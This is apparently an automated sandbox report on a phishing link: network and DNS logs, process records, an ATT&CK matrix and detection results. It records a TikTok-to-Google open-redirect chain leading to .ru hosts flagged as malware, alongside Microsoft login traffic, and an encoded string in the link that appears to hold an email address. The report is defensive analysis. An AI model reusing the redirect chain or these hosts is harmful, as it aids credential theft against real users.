Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/901886f16aa00f3b/1736804243853/712d77cb7e0d781f9c3ef171a5f952730849b6ed771224728ce875a82fa85272/Rpq0TkadgkMtd8p HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901886f16aa00f3b/1736804243853/PTgPS3OFq7peaq1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/901886f16aa00f3b/1736804243853/PTgPS3OFq7peaq1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /34312312326475845lHPzVpHAawKXAPUEABCCOMUVHMSYIMKTEGPFLJPNZNM HTTP/1.1Host: ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://m7sn.shaceshrov.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://m7sn.shaceshrov.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /34312312326475845lHPzVpHAawKXAPUEABCCOMUVHMSYIMKTEGPFLJPNZNM HTTP/1.1Host: ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.tiktok.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: nvchw.com
Source: global trafficDNS traffic detected: DNS query: m7sn.shaceshrov.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: ujnpr9srxzkc6ihaxhmueaobisqyzublxqweh4i01haujvjdngfifo9.ivertoneym.ru
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: www.office.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/291047480:1736802921:6cAIPi7OVuOlpkf5Flnw52f_YS5aDPw6UYjgs6Pq5ck/901886f16aa00f3b/aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3200sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: aug6nWRD8oN0o9STjshe0NwiJi9eHu1Mo_8PWDLYFtY-1736804242-1.1.1.1-iKIFn8UsYFPDX5tWJc7Ywt.PhMZpkhR5BUHWkehojzXA67DeXJ8KQhyBWtcjEArvsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/ercd6/0x4AAAAAAA1mJe-KJqboZa9M/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:37:19 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:37:23 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 3537Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=h26TBLVTtzPIJ9qwskmM05jz%2FRcml4h%2BqRQm9ndjxZo%2Bp9rqLiqn26xPkTWlfuMGQDwRW7aTQ5r1ZmIN9tweYD1CYz5xHFGpdQian4USZriP3YfCWz7lwKiNWlGylg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=74770&min_rtt=74755&rtt_var=28044&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2823&recv_bytes=2261&delivery_rate=38097&cwnd=241&unsent_bytes=0&cid=6b468b66a6c361ea&ts=106&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 901886f7e93b9e17-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2029&min_rtt=2027&rtt_var=765&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2830&recv_bytes=1899&delivery_rate=1425085&cwnd=186&unsent_bytes=0&cid=3674b9ad7e4a0e24&ts=3981&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:37:24 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: vwTJQft9BbzrBi43X8KkZA==$LKROQZNm7hICdZbM+1l2xw==cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 901887020c6143e6-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:37:27 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 6vsx56JwNUu5eilnAMCipw==$Bf5xR2ialpfY5EuD46rGeA==Server: cloudflareCF-RAY: 90188713e8084332-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 13 Jan 2025 21:37:30 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: 5UE9n+ot+lQFKzGP/2cAEg==$fx6RpS8l98GaQ5rN2ni01Q==Server: cloudflareCF-RAY: 901887273b92c481-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_86.1.dr, chromecache_93.1.drString found in binary or memory: https://login.microsoftonline.com
Source: chromecache_86.1.dr, chromecache_93.1.drString found in binary or memory: https://login.windows-ppe.net
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: classification engineClassification label: mal52.win@23/77@42/14
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1908,i,14219803706752478215,14568198449669623511,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fnvchw.com%2Fwinner%2F1dsbr%2FcmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 --field-trial-handle=1908,i,14219803706752478215,14568198449669623511,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
Browser Extensions
1
Process Injection
1
Masquerading
OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
Registry Run Keys / Startup Folder
1
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
https://www.tiktok.com/link/v2?aid=1988&lang=en&scene=bio_url&target=https%3A%2F%2Fgoogle.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%253Dhttps%3A%2F%2Fwww.google.com%2Furl%3Fq%3D.%2F%2F%2F%2Famp%2Fs%2Fnvchw.com%2Fwinner%2F1dsbr%2FcmxhbXByb3NAb2Zzb3B0aWNzLmNvbQ==?0s57db=MTMmMTMmMTMmMTMmQjEmRjQmb2JxdEczJkQ0Jk11bHdyVGhHeUtZLi45SjNYNlJyamY6ckY0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEmRjQmbW51aUczJkQ0JkIxJkY0JnplcGNHMyZENCZCMSZGNCZ6ZXBjRDQmQjEmRjQmZWJmaUczJkQ0JkIxJkY0JmZtenV0RzMmRDQmMTMmMTMmMTMmMTMmQjEmRTgmMTMmMTMmMTMmMTMmMTMmMTMmMTMmMTMmQjEmQzQmb2ZlZWppMTMmQjQmenVqbWpjanRqdzEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJjEzJkIxJkM0JmZ1aml4MTMmQjQmc3BtcGQxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZDOCYxMyZ1eWZ1Lm9mZWVqaS8xMyYxMyYxMyYxMyYxMyYxMyYxMyYxMyZCMSZGNCZmbXp1dEQ0JjEzJjEzJjEzJjEzJkIxJkY0JmZtdWp1RzMmRDQmZm5wSUY0JmZtdWp1RDQmMTMmMTMmMTMmMTMmQjEmRzMmKzEzJmZzMTMmZWViMTMmRTQmRTQmRTQmRTQmRTQmRTQmRDQmMTMmK0czJjEzJjEzJkY0JjMzJkI6NjMmMTk2MyYzRjYzJkRCNjMmMzk2MyYzRjYzJjRCNjMmNEQ2MyY1MyY1MyZCOjYzJjE5NjMmM0Y2MyZEQjYzJjM5NjMmM0Y2MyY0QjYzJjRENjMmRTQmRTQmeGN6Nnpka21IZXtHSGN4MlRaelM0Wm1HSFJpT1hidkdIZXs2VFp2R25bbVM0ZEczJkROUEVHMyZ6ZndzdnR0c2Z6YkczJmx2L3BkL3pmd3N2dHRzZnpiRzMmRzMmQjQmdHF1dWlFNCZtc3ZDNCYzMzMmRTQmdW9mdW9wZDEzJjMzJml0ZnNnZnMzMyZFNCZ3anZyZi5xdXVpMTMmYnVmbkQ0JjEzJjEzJjEzJjEzJkIxJkY0JjMzJjkuR1VWMzMmRTQmdWZ0c2JpZDEzJmJ1Zm5ENCYxMyYxMyYxMyYxMyZCMSZGNCZlYmZpRDQmQjEmRjQmbW51aUQ0JkIxJkY0Jm9icXRHMyZENCZkazdoWlZENCZ0ezVNRTQmTFhteDFPUWdkWFBZc3s1d0c5e1FFNiZDT0Y0JjMzJnV5ZnUub2ZlZWppMzMmRTQmdHRibWQxMyZvYnF0RDQmQjEm0%Avira URL Cloudsafe
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://m7sn.shaceshrov.ru/IgEEv/100%Avira URL Cloudmalware
